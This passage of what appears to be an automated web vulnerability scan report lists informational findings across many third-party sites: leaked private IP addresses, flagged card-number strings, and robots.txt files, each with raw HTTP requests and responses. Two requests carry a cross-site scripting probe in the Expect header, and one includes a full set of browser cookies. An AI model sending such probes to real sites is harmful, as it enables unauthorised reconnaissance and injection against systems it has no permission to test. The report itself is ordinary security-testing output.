Last-Modified: Mon, 12 Jun 2000 23:51:00 GMT
ETag: "0ca4efc9d4bf1:141c"
Content-Length: 318

..............(.......(....... ........................................................................................................................p......................p.....0...;..0..........
...[SNIP]...

28.19. http://www.sunshinereview.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sunshinereview.org
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sunshinereview.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1851422213
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:25:56 GMT
Via: 1.1 varnish 172.17.3.164
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

28.20. http://www.sweepsadvantage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweepsadvantage.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sweepsadvantage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 586451040
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:36:58 GMT
Via: 1.1 varnish 172.16.11.7
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

29. Credit card numbers disclosed
There are 2 instances of this issue:


29.1. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf HTTP/1.1
Host: csrc.nist.gov
Proxy-Connection: keep-alive
Referer: http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Range: bytes=0-32767

Response

HTTP/1.1 206 Partial Content
Date: Sun, 01 May 2011 23:33:16 GMT
Server: Apache
Last-Modified: Fri, 03 Feb 2006 15:14:30 GMT
ETag: "82c001-1178ba-40be55ea30180"
Accept-Ranges: bytes
Content-Length: 32768
NIST: g3
Content-Range: bytes 0-32767/1145018
Content-Type: application/pdf

%PDF-1.3%....
10430 0 obj<</H[840 4431]/Linearized 1/E 26002/L 1145018/N 75/O 10438/T 936368>>endobj
xref
10430 26
0000000016 00000 n
0000005613 00000 n
0000000840 00000 n
00000059
...[SNIP]...
nt/Encoding/WinAnsiEncoding/BaseFont/Arial-BoldMT/FirstChar 32/LastChar 151/Subtype/TrueType/FontDescriptor 10442 0 R/Widths[278 0 0 0 0 0 722 0 333 333 0 0 278 333 278 278 556 556 556 556 556 556 556 556 556 556 0 0 0 0 0 0 0 722 722 722 722 667 611 778 722 278 0 0 611 833 722 778 667 0 722 667 611 722 667 944 0 0 0 0 0 0 0 0 0 556 611 556 611 556 333 611 611 278 278 556 278 889 611 611 611 0 389 556 333 611 556 778 556 55
...[SNIP]...
611 556 722 722 333 389 722 611 889 722 722 556 0 667 556 611 722 722 944 722 0 611 333 0 333 0 0 0 444 500 444 500 444 333 500 500 278 278 500 278 778 500 500 500 500 333 389 278 500 500 722 500 500 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 444 444 0 500 1000]>
...[SNIP]...

29.2. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="6|1060|4591212860736857|fe671ba9,a768d0cc">
...[SNIP]...

30. Robots.txt file
There are 476 instances of this issue:


30.1. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/a76bb4a499349279e0339b78885213c6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Mon, 02 May 2011 02:47:03 GMT
Expires: Mon, 02 May 2011 02:52:03 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

30.2. http://0.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

30.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/31345061262d8fde4fa5256164900115

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Mon, 02 May 2011 02:48:11 GMT
Expires: Mon, 02 May 2011 02:53:11 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

30.4. http://1051679.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1051679.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1051679.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:34:13 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

30.5. http://1188110.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1188110.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1188110.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

30.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 01 May 2011 23:33:33 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

30.7. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 02:20:08 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

30.8. http://adx.g.doubleclick.net/pagead/adview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 02:00:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

30.9. http://ajax.googleapis.com/ajax/static/modules/gviz/1.0/geomap/geomap.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/static/modules/gviz/1.0/geomap/geomap.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Mon, 02 May 2011 02:29:15 GMT
Expires: Mon, 02 May 2011 02:29:15 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

30.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

30.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:14 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

30.12. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.statcounter.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Sep 2010 14:41:23 GMT
ETag: "3d8800c-1a-49166f495eac0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

30.13. http://cdn.turn.com/server/ddc.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:10:39 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

30.14. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:57:16 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

30.15. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: csrc.nist.gov

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:29 GMT
Server: Apache
Last-Modified: Fri, 28 May 1999 13:23:27 GMT
ETag: "20dc40b-97-34beb0b2c91c0"
Accept-Ranges: bytes
Content-Length: 151
NIST: g3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /icons
Disallow: /images
Disallow: /rskforum/latest
Disallow: /virus/virusl/latest
Disallow: /virusl/latest

30.16. http://d.chango.com/m/s/AdBrite

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.chango.com
Path:   /m/s/AdBrite

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.chango.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Server: Chango RTB Server
Last-Modified: Wed, 02 Mar 2011 15:52:04 GMT
Etag: "d8d4e537fbe8b5596b7ccb406a5b59efdf4b7d1d"
Cache-Control: public
Content-Type: text/plain

User-agent: *
Disallow: /

30.17. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "68cc3-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

30.18. http://digg.com/tools/diggthis.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:41 GMT
Server: Apache
Last-Modified: Tue, 26 Apr 2011 18:18:43 GMT
Accept-Ranges: bytes
Content-Length: 509
Vary: Accept-Encoding
X-Digg-Time: D=310 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9997
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

30.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 02:09:18 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

30.20. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 01 May 2011 23:25:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

30.21. http://insurancenewsnet.com/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: insurancenewsnet.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 04 Apr 2011 20:01:21 GMT
Accept-Ranges: bytes
ETag: "bd67b4113f3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:27 GMT
Connection: close
Content-Length: 852

# Robots.txt file created by http://www.instantposition.com
# For domain: http://www.insurancenewsnet.com

# All robots will spider the domain
User-agent: *
Disallow: /admin
disallow: /App_code
...[SNIP]...

30.22. http://loadm.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3895397314"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Mon, 02 May 2011 01:58:27 GMT
Server: HTTP server

User-agent: *
Disallow: /

30.23. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-671023721"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server

User-agent: *
Disallow: /

30.24. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 02 May 2011 02:35:32 GMT
Connection: close

# go away
User-agent: *
Disallow: /

30.25. http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/wpni_generic_ad.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 23:10:56 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=383
Date: Sun, 01 May 2011 23:33:17 GMT
Content-Length: 1142
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...

30.26. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "355146-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www162
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.27. http://n4403ad.doubleclick.net/adj/gn.japanator.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /adj/gn.japanator.com/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

30.28. http://na.decdna.net/n/61239/71938/EI6/x/e

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: na.decdna.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Dec 2010 04:06:03 GMT
ETag: "a70050-1a-7907e0c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

30.29. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 10 Apr 2011 16:13:15 GMT
Accept-Ranges: bytes
Content-Length: 193
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

# For domain: http://news.yahoo.com/
# All robots will spider the domain
# Used for better SEO indexing and blocking of certain directories

User-agent: *
Disallow: /*?
Disallow: /topics/*page

30.30. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /internal/ModTwitWSJMarkets.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:02 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:42 GMT
Accept-Ranges: bytes
Content-Length: 1471
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=15
Connection: Keep-Alive
Content-Type: text/plain

##ACAP version=1.0

User-agent: *
Disallow: /article_email/
Disallow: /article_print/
Disallow: /PA2VJBNA4R/
Disallow: /home/
Disallow: /advanced_search/
Disallow: /login/
Disallow: /acct/
D
...[SNIP]...

30.31. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:58:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

30.32. http://pixel.invitemedia.com/admeld_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

30.33. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 03 May 2011 01:57:46 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 02 May 2011 01:57:46 GMT
Server: QS

User-agent: *
Disallow: /

30.34. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:58:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

30.35. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 02:10:38 GMT
